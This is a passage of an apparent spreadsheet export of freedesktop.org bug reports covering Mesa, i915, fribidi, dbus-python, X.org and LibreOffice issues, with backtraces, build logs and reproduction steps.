In our OpenGL compositor we double-buffer some windows by using GL_EXT_framebuffer_object and glTexCopyImage to copy the window backing pixmap to a new texture.
This crashes on r600g (but not Intel DRI) drivers in Gallium's implementation of glCheckFramebufferStatusEXT due to a NULL deference.
I've attached a program that demonstrates the crash using a scratch pixmap created by the program instead of a window backing store pixmap created by XComposite. It's built with:
gcc -O2 -ggdb -Wall -Werror -o framebuffertexturetest framebuffertexturetest.c -lX11 -lGL -lGLEW -lGLU
When I run this against git versions of Mesa I get the following backtrace (via gdb):
(gdb) t a a bt full
Thread 1 (Thread 0xb7a1e6d0 (LWP 971)):
#0  0xb771a9b4 in st_validate_attachment (ctx=0x8162248 screen=0x8063968 att=0x81aabd8 bindings=2) at state_tracker/st_cb_fbo.c:472
        stObj = 0x81aa4b8
        format = 
        texFormat = 
#1  0xb771ab6a in st_validate_framebuffer (ctx=0x8162248 fb=0x81aa9f8) at state_tracker/st_cb_fbo.c:570
        att = 0x81aabd8
        format = 
        screen = 0x8063968
        depth = 0x81aab68
        stencil = 0x81aab84
        i = 
        first_format = 
        mixed_formats = 1 '\001'
#2  0xb76be381 in _mesa_test_framebuffer_completeness (ctx=0x8162248 fb=0x81aa9f8) at main/fbobject.c:866
        numImages = 
        intFormat = 
        minWidth = 
        minHeight = 
        maxWidth = 
        maxHeight = 
        numSamples = 
        i = 
        j = 
        __PRETTY_FUNCTION__ = _mesa_test_framebuffer_completeness
#3  0xb76bff48 in _mesa_CheckFramebufferStatusEXT (target=36160) at main/fbobject.c:1850
        buffer = 0x81aa9f8
        ctx = 0x8162248
#4  0xb7e6d6e8 in glCheckFramebufferStatusEXT (target=36160) at ../../../src/mapi/glapi/glapitemp.h:5728
No locals.
#5  0x08049a2f in render_to_texture (target_texture=1) at framebuffertexturetest.c:151
        framebuffer = 1
        value = 
        pixmapAttribs = {8406 8412 8405 8410 0}
        glx_pixmap = 2097159
        gc = 
        attrib = {x = 0 y = 0 width = 1920 height = 1200 border_width = 0 depth = 24 visual = 0x8056ab8 root = 343 class = 1 bit_gravity = 0 win_gravity = 1 backing_store = 0 backing_planes = 4294967295 backing_pixel = 0 
          save_under = 0 colormap = 2097153 map_installed = 0 map_state = 2 all_event_masks = 0 your_event_mask = 0 do_not_propagate_mask = 0 override_redirect = 0 screen = 0x80566c8}
        visualid = 273
        fbconfigs = 0x81a74f0
        nfbconfigs = 144
        status = 
        bound_texture = 4
        i = 
        pixmap = 2097157
        visinfo = 
#6  main (argc=1 argv=0xbffff6e4) at framebuffertexturetest.c:344
        last_frame_time = 
        start_time = 
        ust = 577789755707940852
        msc = 
        draw_texture = 1
My X stack is using the following components from git everything else is from Fedora 15 apart from the kernel which is airlied's drm-fixes:
dri2proto: commit 7fd18b15646a62bd82a4eb0eca60a34c1731813d
drm: commit 8d055890d90c3d92647e3d8b98d32630ef87c2c8
glproto: commit 6d7e398150dde1c15b7f62f485cb33bad8f4d5c6
libpciaccess: commit f9159b97834ba4b4e42a07953a33866e7ac90dbd
mesa: commit 5fe5d236c26b3b2428bc7395304e40cf21d3d3e1
pixman: commit e814b50877bf313619fbf777dcab98d39874f8a4
randrproto: commit b5c977ad70b845c278ef52c004d9e5fc3ec97cbf
xf86-input-evdev: commit 5069e053354ad6adfcbb08c962bff93b607dec3d
xf86-video-ati: commit e8d0d437957b15252dfad775796a3949ed50dbcf
xorg-font-util: commit 9f807dfb4e7bea7128b7538e41de78bb5994ca80
xorg-macros: commit 08dd5d30c137abe43d5b1673edc39eb569881d66
xproto: commit 06ebd5b88bee8c54222bde3178dc773776036802
xserver: commit 73c05be80a1d682ff623e66f47e87403d94caef5
I'm going to start digging see if I can work out where my texture goes missing but all advice would be gratefully received my goal is to keep the pixmap GPU-side if possible while copying its contents to a separate texture.</t>
  </si>
  <si>
    <t>DRI-78890</t>
  </si>
  <si>
    <t>[BDW Regression rc6] igt/gem_ring_sync_copy fails</t>
  </si>
  <si>
    <t>Created attachment 99303
dmesg
==System Environment==
--------------------------
Regression: Yes. 
Good commit on -next-queued(b7c0d9df97c10ec5693a838df2fd53058f8e9e96)
The test was blocked by Bug 78274 unable to bisect.
Non-working platforms: BDW
==kernel==
--------------------------
-nightly: f79ba79cf037eea9ee757ad37730b00f43d5ef80 (fails)
-queued: d3b448d9917a3d6531e499d88bfb13ea5e31e4ad (fails)
    Author: Chris Wilson 
    Date:   Fri May 16 18:59:00 2014 +0100
    drm/i915: Only unpin the default ctx object if it exists
    Since commit 691e6415c891b8b2b082a120b896b443531c4d45
    Author: Chris Wilson 
    Date:   Wed Apr 9 09:07:36 2014 +0100
        drm/i915: Always use kref tracking for all contexts.
    we have contexts everywhere and so we must be careful to distinguish
    fake contexts which do not have an associated bo and real ones which
    do. In particular we now need to be careful not to dereference NULL
    pointers.
    This is one such example as the commit highlighted above failed to move
    the unpinning of the default ctx object into the real-context-only
    branch.
    Reported-by: Daniel Vetter 
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=78792
    Signed-off-by: Chris Wilson 
    Cc: Daniel Vetter 
    Cc: Ben Widawsky 
    Cc: Mika Kuoppala 
    Cc: Jani Nikula 
    Signed-off-by: Daniel Vetter 
-fixes: e95a2f7509f5219177d6821a0a8754f93892ca56 (works)
    Author: Ville SyrjÃ¤lÃ¤ 
    Date:   Thu May 8 15:09:19 2014 +0300
    drm/i915: Increase WM memory latency values on SNB
    On SNB the BIOS provided WM memory latency values seem insufficient to
    handle high resolution displays.
    In this particular case the display mode was a 2560x1440@60Hz which
    makes the pixel clock 241.5 MHz. It was empirically found that a memory
    latency value if 1.2 usec is enough to avoid underruns whereas the BIOS
    provided value of 0.7 usec was clearly too low. Incidentally 1.2 usec
    is what the typical BIOS provided values are on IVB systems.
    Increase the WM memory latency values to at least 1.2 usec on SNB.
    Hopefully this won't have a significant effect on power consumption.
    v2: Increase the latency values regardless of the pixel clock
    Cc: Robert N 
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=70254
    Tested-by: Robert Navarro 
    Tested-by: Vitaly Minko 
    Cc: stable@vger.kernel.org
    Signed-off-by: Ville SyrjÃ¤lÃ¤ 
    Signed-off-by: Jani Nikula 
==Bug detailed description==
-----------------------------
igt/gem_ring_sync_copy fails
Output:
./gem_ring_sync_copy
IGT-Version: 1.6-g252d115 (x86_64) (Linux: 3.15.0-rc3_drm-intel-next-queued_d3b448_20140519+ x86_64)
Test assertion failure function bo_check file gem_ring_sync_copy.c:129:
Last errno: 0 Success
Failed assertion: data-&gt;linear[i] == val
error: 11 == 10
Subtest sync-render-blitter-write-read: FAIL
Test assertion failure function bo_check file gem_ring_sync_copy.c:129:
Last errno: 0 Success
Failed assertion: data-&gt;linear[i] == val
error: 11 == 10
Subtest sync-render-blitter-read-write: FAIL
Subtest sync-render-blitter-write-write: SUCCESS
Test assertion failure function bo_check file gem_ring_sync_copy.c:129:
Last errno: 0 Success
Failed assertion: data-&gt;linear[i] == val
error: 12 == 10
Subtest sync-blitter-render-write-read: FAIL
Subtest sync-blitter-render-read-write: SUCCESS
Test assertion failure function bo_check file gem_ring_sync_copy.c:129:
Last errno: 0 Success
Failed assertion: data-&gt;linear[i] == val
error: 10 == 12
Subtest sync-blitter-render-write-write: FAIL
==Reproduce steps==
---------------------------- 
1. ./gem_ring_sync_copy</t>
  </si>
  <si>
    <t>MESA-97285</t>
  </si>
  <si>
    <t>Darkness in Dota 2 after Patch Make Gallium's BlitFramebuffer follow the GL 4.4 sRGB rules</t>
  </si>
  <si>
    <t>After updating to mesa master (6575ebdc) Dota 2 colors are much more darker.
From the IRC log 2016-08-10 it seems haagch already bisected it:
15:53 #radeon:  anyway am I the only one seeing some opengl games being far too dark like dota 2 and portal 2? 
16:03 #radeon:  haagch since when? maybe since those sRGB changes? 
16:38 #radeon:  nha: you were right 3190c7ee9727161d627f107c2e7f8ec3a11941c1 is the first bad commit 
I can confirm that reverting patch 3190c7ee9727161d627f107c2e7f8ec3a11941c1 takes away the darkness in Dota 2.
My configuration:
OpenGL renderer string: Gallium 0.4 on AMD CYPRESS (DRM 2.46.0 / 4.8.0-rc1 LLVM 3.8.1)
OpenGL core profile version string: 4.1 (Core Profile) Mesa 12.1.0-devel (git-796d760)
OpenGL core profile shading language version string: 4.10</t>
  </si>
  <si>
    <t>edmondo.tommasina</t>
  </si>
  <si>
    <t>FRIBIDI-15328</t>
  </si>
  <si>
    <t>bidi</t>
  </si>
  <si>
    <t>LRM/MLR marks not converted between cp1255 and UNICODE</t>
  </si>
  <si>
    <t>Created attachment 15629
Patch that fixes this issue
Hello
I use fribidi library in BiDiTeX project --
support of Hebrew for LaTeX documents and I found
that when I work with documents in cp1255
LRM/RLM marks are not converted correctly
and the code does not work.
There is a bug in fribidi library or
more exactly in fribidi_cp1255_to_unicode_c()
and fribidi_unicode_to_cp1255_c() functions.
It does not convert LRM/RLM marks to UNICODE symbols
as required (253 254  0x200E0x200F).
The same happens in reverse direction
(unicode to cp1255)
The easiest way to reproduce the problem is following:
Take text (a ×!RLM b) in utf-8
and run through fribidi you'll see a !× b as it should be
Same text encoded with cp1255 run with fribidi -c cp1255
you'll see a ×! b -- incorrect one.
The patch that fixes this problem is attached
it was build against version 0.10.9
Artyom</t>
  </si>
  <si>
    <t>artyomtnk</t>
  </si>
  <si>
    <t>DBUS-57140</t>
  </si>
  <si>
    <t>tests fail on narrow Python builds</t>
  </si>
  <si>
    <t>Making check in _dbus_bindings
make[1]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/_dbus_bindings'
make  check-local
make[2]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/_dbus_bindings'
check-coding-style.mk: checking C sources...
make[2]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/_dbus_bindings'
make[1]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/_dbus_bindings'
Making check in _dbus_glib_bindings
make[1]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/_dbus_glib_bindings'
make[1]: Nothing to be done for `check'.
make[1]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/_dbus_glib_bindings'
Making check in examples
make[1]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/examples'
make[1]: Nothing to be done for `check'.
make[1]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/examples'
Making check in m4
make[1]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/m4'
make[1]: Nothing to be done for `check'.
make[1]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/m4'
Making check in test
make[1]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/test'
make  test-import-repeatedly
make[2]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/test'
make[2]: `test-import-repeatedly' is up to date.
make[2]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/test'
make  check-TESTS
make[2]: Entering directory `/sources/blfs/xc/dbus-python-1.1.1/test'
Running dbus-launch --sh-syntax --config-file=/sources/blfs/xc/dbus-python-1.1.1/test/tmp-session-bus.conf
Started bus pid 7015 at unix:abstract=/tmp/dbus-zeHIGmVvBLguid=116ea05b510e7cf6c319f5b050a465c6
Running: ./run-test.sh 
DBUS_TOP_SRCDIR=/sources/blfs/xc/dbus-python-1.1.1
DBUS_TOP_BUILDDIR=/sources/blfs/xc/dbus-python-1.1.1
PYTHONPATH=/sources/blfs/xc/dbus-python-1.1.1/test/.libs:/sources/blfs/xc/dbus-python-1.1.1:/sources/blfs/xc/dbus-python-1.1.1/test:/sources/blfs/xc/dbus-python-1.1.1/_dbus_bindings/.libs:/sources/blfs/xc/dbus-python-1.1.1/_dbus_glib_bindings/.libs
PYTHON=/x1/bin/python
running test-standalone.py
test_object_path_no_match (__main__.TestMatching) ... ok
test_string_match (__main__.TestMatching) ... ok
test_append (__main__.TestMessageMarshalling) ... ok
test_append_Byte (__main__.TestMessageMarshalling) ... ok
test_append_ByteArray (__main__.TestMessageMarshalling) ... ok
test_append_Variant (__main__.TestMessageMarshalling) ... ok
test_count (__main__.TestMessageMarshalling) ... ok
test_destination (__main__.TestMessageMarshalling) ... ok
test_get_args_options (__main__.TestMessageMarshalling) ... ok
test_guess_signature (__main__.TestMessageMarshalling) ... ok
test_guess_signature_dbus_types (__main__.TestMessageMarshalling) ... ok
test_guess_signature_python_ints (__main__.TestMessageMarshalling) ... ok
test_interface (__main__.TestMessageMarshalling) ... ok
test_member (__main__.TestMessageMarshalling) ... ok
test_object_path_attr (__main__.TestMessageMarshalling) ... ok
test_path (__main__.TestMessageMarshalling) ... ok
test_sender (__main__.TestMessageMarshalling) ... ok
test_struct (__main__.TestMessageMarshalling) ... ok
test_utf8 (__main__.TestMessageMarshalling) ... ERROR
test_Array (__main__.TestTypes) ... ok
test_Byte (__main__.TestTypes) ... ok
test_ByteArray (__main__.TestTypes) ... ok
test_Dictionary (__main__.TestTypes) ... ok
test_Double (__main__.TestTypes) ... ok
test_Signature (__main__.TestTypes) ... ok
test_Struct (__main__.TestTypes) ... ok
test_integer_limits_16 (__main__.TestTypes) ... ok
test_integer_limits_32 (__main__.TestTypes) ... ok
test_integer_limits_64 (__main__.TestTypes) ... ok
test_integers (__main__.TestTypes) ... ok
test_object_path_attr (__main__.TestTypes) ... ok
======================================================================
ERROR: test_utf8 (__main__.TestMessageMarshalling)
----------------------------------------------------------------------
Traceback (most recent call last):
  File /sources/blfs/xc/dbus-python-1.1.1/test/test-standalone.py line 451 in test_utf8
    uni(0x0001FFFE)
  File /sources/blfs/xc/dbus-python-1.1.1/test/test-standalone.py line 437 in uni
    return unichr(x)
ValueError: unichr() arg not in range(0x10000) (narrow Python build)
----------------------------------------------------------------------
Ran 31 tests in 0.031s
FAILED (errors=1)
./run-test.sh: test-standalone.py failed
killing message bus 7015
/sources/blfs/xc/dbus-python-1.1.1/test/run-with-tmp-session-bus.sh: script ./run-test.sh failed
FAIL: run-test.sh
PASS: test-import-repeatedly
========================================================================================
1 of 2 tests failed
Please report to http://bugs.freedesktop.org/enter_bug.cgi?product=dbus&amp;component=python
========================================================================================
make[2]: *** [check-TESTS] Error 1
make[2]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/test'
make[1]: *** [check-am] Error 2
make[1]: Leaving directory `/sources/blfs/xc/dbus-python-1.1.1/test'
make: *** [check-recursive] Error 1</t>
  </si>
  <si>
    <t>xcrdjn</t>
  </si>
  <si>
    <t>XORG-11055</t>
  </si>
  <si>
    <t>XrmDestroyDatabase() should unlock mutex before destroying it</t>
  </si>
  <si>
    <t>Any application that uses xine-lib is aborted by NetBSD thread library on exit with the following message: Error detected by libpthread: Destroying locked mutex.</t>
  </si>
  <si>
    <t>svs</t>
  </si>
  <si>
    <t>MESA-53179</t>
  </si>
  <si>
    <t>libOSMesa / libdricore not linked well</t>
  </si>
  <si>
    <t>There is bunch of unresolved symbols in libOSMesa.so (git master as of today). Looks like at least -lm -ldl is missing.
Unresolved symbols found in: /home/users/arekm/tmp/Mesa-8.1.0-root-arekm/usr/lib64/libOSMesa.so.8.1.0
        sincos
        sqrt
        floor
        sinf
        __fpclassifyf
        truncf
        _glapi_get_proc_address
        dlsym
        _glapi_get_dispatch_table_size
        powf
        sqrtf
        expf
        log
        ceilf
        sincosf
        exp2f
        _glapi_get_context
        logf
        floorf
        _glapi_add_dispatch
        cosf
        exp
        _glapi_check_multithread
        _glapi_tls_Context
        _glapi_set_context
        pow
        cos
        log2f
        dlopen
        dlclose
        _glapi_set_dispatch
        _glapi_tls_Dispatch
Same for libdricore.so
Unresolved symbols found in: /home/users/arekm/tmp/Mesa-8.1.0-root-arekm/usr/lib64/libdricore8.1.0.so.1.0.0
        dlsym
        _glapi_get_dispatch_table_size
        _glapi_get_context
        _glapi_add_dispatch
        _glapi_tls_Context
        _glapi_set_context
        dlopen
        dlclose
        _glapi_set_dispatch
        _glapi_tls_Dispatch</t>
  </si>
  <si>
    <t>XORG-18550</t>
  </si>
  <si>
    <t>commit Workaround to make initial rotation work breaks output on my HD3850 AGP.</t>
  </si>
  <si>
    <t>Created attachment 20338
Xorg.log
Current git does not work anymore for mt HD3850 AGP card.
The monitor will go into stanby after startx (sometimes after a few seconds it will come out but display is still blank). X is still alive and working and I can switch VTs/ and get back to console OK.
git bisect came up with -
bash-3.2$ git bisect good
346228b20c69a965c9e7d67157f42c1d36a5b6c3 is first bad commit
commit 346228b20c69a965c9e7d67157f42c1d36a5b6c3
Author: Alex Deucher 
Date:   Wed Oct 1 14:38:27 2008 -0400
    Workaround to make initial rotation work
    Acceleration needs to be initialized before setting the mode
    for initial rotation to work.  Changing the order in RADEONScreenInit()
    doesn't work because RADEONDRIKernelInit() hangs in the ioctl to
    initialize the CP if the mode is not set prior (even if the heads
    are turned off after setting the mode).  The workaround is to set the
    modes twice once before accel and once after.
    This needs to be looked into further.
:040000 040000 8ab3cc0db17934dc2ad98ed587af72861d3d6b93 af5f45d47971f2f07054b72f2de4e55cd974c09c M      src</t>
  </si>
  <si>
    <t>MESA-97102</t>
  </si>
  <si>
    <t>[dri][swr] stack overflow / infinite loop with GALLIUM_DRIVER=swr</t>
  </si>
  <si>
    <t>Created attachment 125360
gl.c
$ gcc -o gl gl.c -lGL -lglfw
$ LIBGL_ALWAYS_SOFTWARE=1 GALLIUM_DRIVER=swr ./gl</t>
  </si>
  <si>
    <t>XORG-5226</t>
  </si>
  <si>
    <t>App/luit</t>
  </si>
  <si>
    <t>luit fails to find locale.alias</t>
  </si>
  <si>
    <t>The path to locale.alias is hardcoded into luit's source namely in parser.h:
#ifndef LOCALE_ALIAS_FILE
#define LOCALE_ALIAS_FILE /usr/X11R6/lib/X11/locale/locale.alias
#endif
LOCALE_ALIAS_FILE is not defined anywhere else neither in luit's source nor
in any other X library's source. As a result luit tries to open
/usr/X11R6/lib/X11/locale/locale.alias but it fails since libx11 has
installed this file to a different location (and anyway it'll be X11R7 soon).
As a result luit starts up with a warning like this:
Warning: couldn't find charset data for locale hu_HU using ISO 8859-1.
and then operates incorrectly since assumes an incorrect charset.
Suggested fixes:
either: preprocess parser.h just as luit.man is preprocessed now so the
manpage of luit mentions the real location of my locale.alias file
or: define LOCALE_ALIAS_FILE in a header file shipped by libx11 (which ships
this locale.alias file too) and make sure to include this from luit.</t>
  </si>
  <si>
    <t>egmont</t>
  </si>
  <si>
    <t>LIBREOFFICE-62797</t>
  </si>
  <si>
    <t>UI: Impossible to assign a macro to a drawing or picture</t>
  </si>
  <si>
    <t>Hello
Steps to reproduce:
1. File&gt; New&gt; Spreadsheet (but same with an existing one)
2. Display the Drawing toolbar (if it is not already)
3. Select the Rectangle tool and draw (but same with another tool)
4. Right-click the object and then Assign Macro dialog
opens.
Expected Result: The list Macros at the bottom left should
display the tree My Macros Macros Libo Untitled 1
Actual result: the list is empty
List existing Macros is empty even when the spreadsheet contains macros.
Note:
- Same to assign a macro to a picture
- ImageMap suffers from the same problem (which would have been a workaround for pictures)
Verified (qa-fr) with:
Windows 7:
.Version 4.0.1.2
.Version 4.0.2.1 (Build ID: 7e5467ff8f30d821f4fbf69cb2769163eb64c2c)
.Version 4.1.0.0.alpha0+ (Build ID: 8e658ca263808d3466c62b2acfc82d61901fa57
.4.0.3.0+  (Build ID: 2a2ada8fcfeb18b91599a8fb09f3c2081e66abe)
Vista-32b:
.Version 4.0.2.1 (Build ID: 7e5467ff8f30d821f4fbf69cb2769163eb64c2c)
This still works with:
3.6.2.1
3.6.4.3 portable (long delay before the list fills)
3.6.5.2
3.6.6.1 (long delay before the list fills)
Regards
Pierre-Yves
Operating System: All
Version: 4.0.0.1 rc</t>
  </si>
  <si>
    <t>DRI-80434</t>
  </si>
  <si>
    <t>[HSW/BDW] Asus PA238Q monitor: there's no DP 48Khz sound output after resume from S3</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. aplay -D hw:07 /home/$USER/Music/1_WAV_PCM_48000Hz_stereo_16bit.wav
2. rtcwake -m mem -s 10
3. aplay -D hw:07 /home/$USER/Music/1_WAV_PCM_48000Hz_stereo_16bit.wav
Phenomenon:
at step 1: music cat be played successful
at step 3: music was be playing but no sound output
Note:
The test steps have been run both on ASUS and DELL monitor but the bug only appears on ASUS PA238Q monitor not on DELL.
This issue only happens to ASUS PA238Q monitor's DisplayPort for 48KHz audio.
Reproduced on both Haswell and Broadwell.</t>
  </si>
  <si>
    <t>LIBREOFFICE-71648</t>
  </si>
  <si>
    <t>Crash: Unable to register Databases</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. Start LibreOffice
2. Choose Menu -&gt; Options
3. LibreOffice Base -&gt; Connections or -&gt; Databases
Current behavior:
LibreOffice crash with no message no error. I can reproduce problem on 2 PC's and 1 laptop all running OpenSuse 12.3
Expected behavior:
Open Databases option to register existing databases.
Operating System: openSUSE
Version: 4.1.3.2 release</t>
  </si>
  <si>
    <t>olivier.musson</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-98756</t>
  </si>
  <si>
    <t>Hello
Please create an account for me. Purpose is to work on libva.
Real Name: Scott D Phillips
Email: scott.d.phillips@intel.com
Preferred Account username: scottph
Thanks
-- 
Scott</t>
  </si>
  <si>
    <t>LIBREOFFICE-59641</t>
  </si>
  <si>
    <t>Tools-&gt;Import Formula-&gt;MathML copies already entered formula</t>
  </si>
  <si>
    <t>Created attachment 73352
Sample mml file to test
When using Import Formula feature if some formula is already entered in the editor importing a MathML file first copies the current formula and then pastes the MathML content. This makes the preceeding formula to show twice.
1. Open Math
2. Enter the following: 1  newline  put the caret after the last .
3. Menu Tools -&gt; Import Formula -&gt; MathML 1.01 -&gt; select some .mml file (attached is a sample mml file created from an example from mathjax site)
Expected: there should be symbol One followed by newline followed by the newly imported formula: 1  newline  
Actual result: two lines with ones before the formula: 1  newline  1  newline  
This does not happen when importing a .odf formula.</t>
  </si>
  <si>
    <t>mikekaganski</t>
  </si>
  <si>
    <t>LIBREOFFICE-83371</t>
  </si>
  <si>
    <t>UI: ACCESSIBILITY: cannot navigate to list Files in LibreOffice dialogs</t>
  </si>
  <si>
    <t>Set to use LibreOffice dialogs via Tools &gt; Options &gt; General
File Open
Focus is on Address field.
One cannot go to the list Files with e.g. Tab
Is OK in 4.3.x and before</t>
  </si>
  <si>
    <t>TELEPATHY-49732</t>
  </si>
  <si>
    <t>catch up with deprecations</t>
  </si>
  <si>
    <t>Part of an ongoing effort to get rid of deprecated things from CMs.</t>
  </si>
  <si>
    <t>PULSEAUDIO-93459</t>
  </si>
  <si>
    <t>[PATCH] Update Ukrainian translation</t>
  </si>
  <si>
    <t>Created attachment 120604
A patch to update translation
The file was tested with msgfmt -vc.
Thanks for applying this patch.</t>
  </si>
  <si>
    <t>yurchor</t>
  </si>
  <si>
    <t>XORG-6613</t>
  </si>
  <si>
    <t>evdev hijacks the /dev/input/eventX device</t>
  </si>
  <si>
    <t>Hi! 
I've been using X.org 6.8 with evdev mouse driver (hacked into X.org by gentoo)
for a while along with the evrouter program to manage extra buttons on my MS
Wireless Explorer mouse. This program monitors /dev/input/event_usb
(udev-created link to this mouse's evdev interface) and does specified actions
(simulates key presses) when extra mouse buttons are pressed.
All this worked fined until I installed X.org 7.0.
When I run X the mouse works fine but evrouter no longer works. Apparently X
somehow gets exclusive access to /dev/input/event_usb because even cat
/dev/input/event_usb produces absolutely no output when I move my mouse / press
any buttons on it. So evrouter doesn't read any mouse events from
/dev/input/event_usb.
This only pertains to the evdev mouse driver my trackpoint (handled by regular
mouse driver) produces output when I cat /dev/input/event_trackpoint.
relevant portion of xorg.conf:
Section InputDevice
        Identifier  usbmouse
        Driver      evdev
        Option      Device   /dev/input/event_usb
        Option      Buttons  9
        Option      SampleRate   500
        Option      Resolution   800
EndSection</t>
  </si>
  <si>
    <t>heilong</t>
  </si>
  <si>
    <t>LIBREOFFICE-59569</t>
  </si>
  <si>
    <t>VIEWING: A object are not correct view in writer or calc LO 4.0.0.1 and is correct in LO 3.6.4</t>
  </si>
  <si>
    <t>Created attachment 73252
File with incorrect view object
I have a file in 3.6.4 is view good but in 4.0.0.1 is not correct view.
The same problem i have in a sheet in calc but when i save the file there isn't a object in the sheet view. So i can't give the file with object in the calc sheet.
LO Versie 4.0.0.1 (Bouw-id: 527dba6f6e0cfbbc71bd6e7b88a52699bb48799)
windows 7 64 bit</t>
  </si>
  <si>
    <t>FONTCONFIG-17262</t>
  </si>
  <si>
    <t>Add two chinese fonts for default non-latin aliases</t>
  </si>
  <si>
    <t>Created attachment 18467
add two chinese fonts
attached patch add two additional chinese fonts to non-latin aliases.</t>
  </si>
  <si>
    <t>LIBREOFFICE-36051</t>
  </si>
  <si>
    <t>FILESAVE of particular big .xls spreadsheets freezes LibO</t>
  </si>
  <si>
    <t>I've some big spreadsheet (15-20MB) whenever I try to save and close one of it calc took a long time to save and then wait for 10-15secs before exit.
If I've modified some cells pulling the contents from nearby cells instead of only write new values it freezes for 5-10 min after the end of the save before close . If I kill libreoffice (even just after the end of the save) when I reopen the file I find the change I made.
The PC remain responsive during the wait only libreoffice freezes. This occours during autosave too.
I've found this problem both in windows and Linux version and with differents files of big size.
Trying to save in odf is a pain: more then 3 minutes to save but when it finish calc is closed in 10 secs.
With smaller files (up to 3-4MB) it close just after the end of the save no matter which format I choose.
The time it tooks to close is nearly the same on a single core 2.2GHz CPU up to a dual core 3.3GHz CPU tested with 1 2 and 35 GB of RAM both on local drive or network share.</t>
  </si>
  <si>
    <t>ercole69</t>
  </si>
  <si>
    <t>TELEPATHY-23651</t>
  </si>
  <si>
    <t>Preferred handler doesn't get the channel if too new no way to handle *only* the request</t>
  </si>
  <si>
    <t>nautilus-sendto does the following when requesting a channel:
  * pop up a new ClientHandler head with a specific filter
  * Request the channel with the CLientHandler head as the preferred handler
In some cases this handler doesn't actually get the channel. From the looks of it this happend because MC starts dispatching the channel before it has finished introspecting the recently popped up handler which means that it's unaware of the specific filter and ignores the preferred handler.
Two potential solutions for this:
  * Always give it to the preferred handler even if its filter is unknown (or 
    even if it doesnt match?)
  * When dispatching a channel with a preferred handler block dispatching   
    until the preferred handler has been fully introspected</t>
  </si>
  <si>
    <t>XORG-6270</t>
  </si>
  <si>
    <t>exa fails to build without composite</t>
  </si>
  <si>
    <t>Making all in ephyr
make[1]: Entering directory `/home/amd/code/xserver/xorg/hw/kdrive/ephyr'
/bin/sh ../../../libtool --tag=CC --mode=link gcc  -D_BSD_SOURCE -DHAS_FCHOWN
-DHAS_STICKY_DIR_BIT -I/home/amd/opt/include   -I../../../include
-I../../../include -I../../../Xext  -I../../../damageext -I../../../xfixes 
-I../../../mi -I../../../miext/shadow  -I../../../miext/damage -I../../../render
-I../../../randr -I../../../fb  -g -O2   -o Xephyr  ephyrinit.o libxephyr.a
libxephyr-hostx.a ../../../dix/libdix.la ../../../hw/kdrive/src/libkdrive.a
../../../hw/kdrive/linux/liblinux.a ../../../fb/libfb.la ../../../mi/libmi.la
../../../xfixes/libxfixes.la ../../../Xext/libXext.la    
../../../render/librender.la ../../../randr/librandr.la
../../../damageext/libdamageext.la ../../../miext/damage/libdamage.la
../../../miext/shadow/libshadow.la  ../../../xkb/libxkb.la
../../../xkb/libxkbstubs.la  ../../../dix/libxpstubs.la ../../../os/libos.la
../../../hw/kdrive/src/libkdrivestubs.a ../../../dix/libdix.la
../../../hw/kdrive/src/libkdrive.a ../../../hw/kdrive/linux/liblinux.a
../../../fb/libfb.la ../../../mi/libmi.la ../../../xfixes/libxfixes.la
../../../Xext/libXext.la     ../../../render/librender.la
../../../randr/librandr.la ../../../damageext/libdamageext.la
../../../miext/damage/libdamage.la ../../../miext/shadow/libshadow.la 
../../../xkb/libxkb.la ../../../xkb/libxkbstubs.la  ../../../dix/libxpstubs.la
../../../os/libos.la ../../../hw/kdrive/src/libkdrivestubs.a  -lX11 -lXext
-lXfont -lXau -lXdmcp   -lXfont -lXau -lfontenc    -lm -lz
../../../exa/libexa.la -lm
gcc -D_BSD_SOURCE -DHAS_FCHOWN -DHAS_STICKY_DIR_BIT -I/home/amd/opt/include
-I../../../include -I../../../include -I../../../Xext -I../../../damageext
-I../../../xfixes -I../../../mi -I../../../miext/shadow -I../../../miext/damage
-I../../../render -I../../../randr -I../../../fb -g -O2 -o Xephyr ephyrinit.o 
libxephyr.a libxephyr-hostx.a ../../../dix/.libs/libdix.a
../../../hw/kdrive/src/libkdrive.a ../../../hw/kdrive/linux/liblinux.a
../../../fb/.libs/libfb.a ../../../mi/.libs/libmi.a
../../../xfixes/.libs/libxfixes.a ../../../Xext/.libs/libXext.a
../../../render/.libs/librender.a ../../../randr/.libs/librandr.a
../../../damageext/.libs/libdamageext.a ../../../miext/damage/.libs/libdamage.a
../../../miext/shadow/.libs/libshadow.a ../../../xkb/.libs/libxkb.a
../../../xkb/.libs/libxkbstubs.a ../../../dix/.libs/libxpstubs.a
../../../os/.libs/libos.a ../../../hw/kdrive/src/libkdrivestubs.a
/usr/lib/libXext.so /usr/lib/libX11.so -ldl /usr/lib/libXdmcp.so
/usr/lib/libXfont.so /usr/lib/libfreetype.so /usr/lib/libXau.so
/usr/lib/libfontenc.so -lz ../../../exa/.libs/libexa.a -lm
../../../exa/.libs/libexa.a(exa.o): In function `exaDriverInit':
/home/amd/code/xserver/xorg/exa/exa.c:433: undefined reference to
`miDisableCompositeWrapper'
collect2: ld returned 1 exit status
make[1]: *** [Xephyr] Error 1
make[1]: Leaving directory `/home/amd/code/xserver/xorg/hw/kdrive/ephyr'
make: *** [all-recursive] Error 1
Sources compiled with following ./configure
./configure '--enable-ipv6' '--disable-composite' '--disable-shm'
'--disable-xres' '--disable-xtrap' '--disable-record' '--disable-xv'
'--disable-dga' '--disable-screensaver' '--disable-xdmcp' '--disable-xdm-auth-1'
'--disable-glx' '--disable-aiglx' '--disable-dri' '--disable-xinerama'
